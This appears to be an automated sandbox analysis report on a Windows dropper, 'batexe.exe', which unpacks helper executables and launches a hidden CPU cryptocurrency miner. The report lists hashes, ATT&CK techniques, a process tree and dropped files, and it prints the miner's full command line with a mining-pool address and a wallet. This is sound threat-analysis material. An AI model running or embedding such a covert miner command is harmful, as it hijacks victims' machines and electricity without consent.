73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
295s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 04:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
3484	b2e.exe
2804	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2804	cpuminer-sse2.exe
2804	cpuminer-sse2.exe
2804	cpuminer-sse2.exe
2804	cpuminer-sse2.exe
2804	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4504-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4504 wrote to memory of 3484	4504	batexe.exe	70
PID 4504 wrote to memory of 3484	4504	batexe.exe	70
PID 4504 wrote to memory of 3484	4504	batexe.exe	70
PID 3484 wrote to memory of 2260	3484	b2e.exe	83
PID 3484 wrote to memory of 2260	3484	b2e.exe	83
PID 3484 wrote to memory of 2260	3484	b2e.exe	83
PID 2260 wrote to memory of 2804	2260	cmd.exe	88
PID 2260 wrote to memory of 2804	2260	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4504
- C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B36.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2260
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2804

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe

Filesize
354KB

MD5
fca4cd5b787cd054b5ab08c1af89481f

SHA1
d3d212ab32fa6397dc6b3fcade43fea396bd35aa

SHA256
8b2d5a1cf2babb1b65380f1c6d8fa5e943f30ab01beaf3c621daeccb07cd91a4

SHA512
17d196ecf5a7cea8ada3b9b32c549296872ed1d763578151787cfe106b3209bdab699a3f58fd419a47578e64b59158b186674c7a5c3d922c344ed40bd161beb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe

Filesize
474KB

MD5
aeedc69c4925cde776b9f4ddb0c0dd7a

SHA1
eb6ac505b169638ce8bb251a72e210a44f3864b0

SHA256
0dde03070a31bc2992ecacc4751e0a59e4907a21a9fc020ca09b9aa409456eeb

SHA512
ea1e39026d6ab5fc89f90c87635e5dc8e6dda80e88d5650f8286029bdc78e2d14b93d4678b6bb735cbd6940b169319b71817ba94bac6da6a634bba24dfce0e80

Download Submit
C:\Users\Admin\AppData\Local\Temp\9904.tmp\b2e.exe

Filesize
864KB

MD5
1cb634ff61c97afef5b3ef2ddec6f95a

SHA1
e23cba69096037b83ae28d94355b859c06c63aa8

SHA256
026cafed02b297d0a6bc96ab6eb0d0e92134a43e55fbd00fbfb23ee4e9b106ea

SHA512
e08de85a8bdef39a61ca2ea6f654cd00bcd3af36834fb5b9ae16818bed83aa38c68ee953d42ae03ecb769d20aaf65f18c62f8865b1285b3befcc295480c087cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\9B36.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
140KB

MD5
099c47c9c973a0db7f54d801b9e13d7b

SHA1
9bad4f0eba6b9fb0f83a6efdba85013d0235d2ae

SHA256
5663a1ad33300cfa4f29c59cec883e3faa3b333ce66d8d42857368211a7c86ad

SHA512
512c72f22341b838cebe1e7b22fde55fe6ccf8fb68474b5efaec5741901a31dada7929de694f1028dac1db62e3adc05d00f168d07d2c4d2e3f7900c444441399

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
104KB

MD5
4becc9a8c7ff3e385ef136e1b76cb693

SHA1
b88893331b4e09267804aa2576cfb90d924b36a6

SHA256
9dfef5a697854c789b658c06bfce9701a79ee2fde408d2e78efc8c4070ac6d73

SHA512
f17d728e79a4cef184d1d98136752158d97aa853a301968c2ae8654ae91be28d3a5ea3ca577ce13b693668891529388f010c1cdbe3fa9d89168355c01c2c1b66

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
203KB

MD5
6420e88b30f98fd443b2623598cbf51a

SHA1
eb2c9584ede9ae4267e4dff5f003634eb1cb3947

SHA256
c8ed046ac55a2f9443b804706c6c71223f5201e483e4378b50e5ed3916ed9dce

SHA512
139e31288a8ba534ae18c98d3902b29127b40d8e267ee6985739f85990e7ce74fdaafbda24fee2bb5a5beb6c5d20ef6d184c1da37686035a5cf06188c7b8252f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
215KB

MD5
8a69572152177b65bf993e686be9d50a

SHA1
6747dc97f1c924d8a36a55732554a1fb8cf15997

SHA256
d5fef13e6272d95953a569629cd26dd9a45c4d75fd66aa6c504a54ce368e09f5

SHA512
cfed4e492feb02f3df7d033c70296b9bccbf165a5142a63f47e8837b92d372136b18b7f1bc5af389785a43b840fbbdcd7689bf03b2df3c473eea06a6ac21ee83

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
129KB

MD5
14c4457769b19553e6657a08f1b095e7

SHA1
106bfd2b59e203b9ea4b4a1887356c8f430f42de

SHA256
3c1a5aa62306c2e12d732806d78f9ff4b260f396965ecafaacaddb57591ddbdf

SHA512
99393f057311dd744c5b0ae5f123b1abf603e3a457c4bfba6124b11bb3c1a5889f92a2f0e9221556c471d3ac04c6bd33d167f67957aaacac4cf0f6e7aa8e9a47

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
263KB

MD5
f8f5422a6afec257399d595a22cccc41

SHA1
9fe0e546e33ee828054eafd187f6a3eeaa52dcab

SHA256
e4d03a28a593b2a6a4f59ad94e04d608926291464eeb3f292c37c0fee0684a3b

SHA512
4e8639e44a826f050a9d0988cd778c1fb9366577d451ebdb72e91037b84112b250b99e97943420e7da61bfc26b87c5b3d178713e97bc5c5420c43edab0416774

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
122KB

MD5
3553f61efae116587de3a4b6b2764ee4

SHA1
99fff1214f7114aa43fe88daab8bb60e7952f691

SHA256
00ea58aee7de7acecdfa38354b31b630568c55ce45a82af4c262163573d29041

SHA512
d43def2eb666a6ecdd3650fad133320c21f3f5db419ee64253b23e18a1922ba1e3fd28a8fbdf846f3c99fcdcf05cfcd76197775524efea73501d312b1a4b9462

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
382KB

MD5
626b6671145dbd9b081cbeaf662c4391

SHA1
b40a0b73dd3e7a5198c86604f10ad6c5de371650

SHA256
ba58c32e0d8d4e4185d0cd25475320a03bb6b614c5f5b02ca1cee2b32491c5aa

SHA512
1486c873a17ac2bfd27e9b71e0dfc95f89744d32c6d8672de529e27b29cdef253d451b9de308434ddf52945a038ac078d786712ce81aa5a3f26550dd5875cd3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
163KB

MD5
073352e6279170de4aa7c3b745d7220b

SHA1
904bb580dbbe8b04ee8f5e99b17e9c04199589a7

SHA256
56b1c046d3a68fe542bc68f9bd71a52f8973c2b843e6c9054927476d2cfa6de0

SHA512
b460ad2a6cd7c16ba7c556ed2f7dd3ef6f4a2b75381139df7174613b3477864d17dffe9d764a0fc83c3e6fc9293b182d7ee7536bb300d7a16a8a6f098c79241c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
235KB

MD5
463c107ab0e5de932adb4cbfd0f2dd4f

SHA1
49222bd3391f9af164fe58a49f53ea190cceda32

SHA256
9a95fd3d185ea9be0b5df1911d13490c77caa3f4899ce59f487bd4dd751ccecc

SHA512
4d1ceb7630ff873006651127998ce9fda072d354cedf6fd17f340530f67576fbaea2136449be5b4b816fc3ce311cdc55f8d7851cfd31175f0e228d07528405fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
273KB

MD5
4fc5b071fdf9f493deb57d1495032fff

SHA1
486e740b5be7a4c0d077a52d1a8cd8861e4e0b14

SHA256
d69551cccd6f4265e9ac68a86199514c3b708c9f762d76e50ee4eef08007db10

SHA512
dbbc455aa1253552545b5a9fc786a2e82808dcc7528f0a53d09ddf40744d990f37d4b17d02b1be89ec86370655e0c8afa0195576b0309a76cd968072eaa810b2

Download Submit
memory/2804-47-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/2804-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2804-45-0x0000000063360000-0x00000000633F8000-memory.dmp

Filesize
608KB

Download
memory/2804-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2804-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2804-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3484-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3484-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4504-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download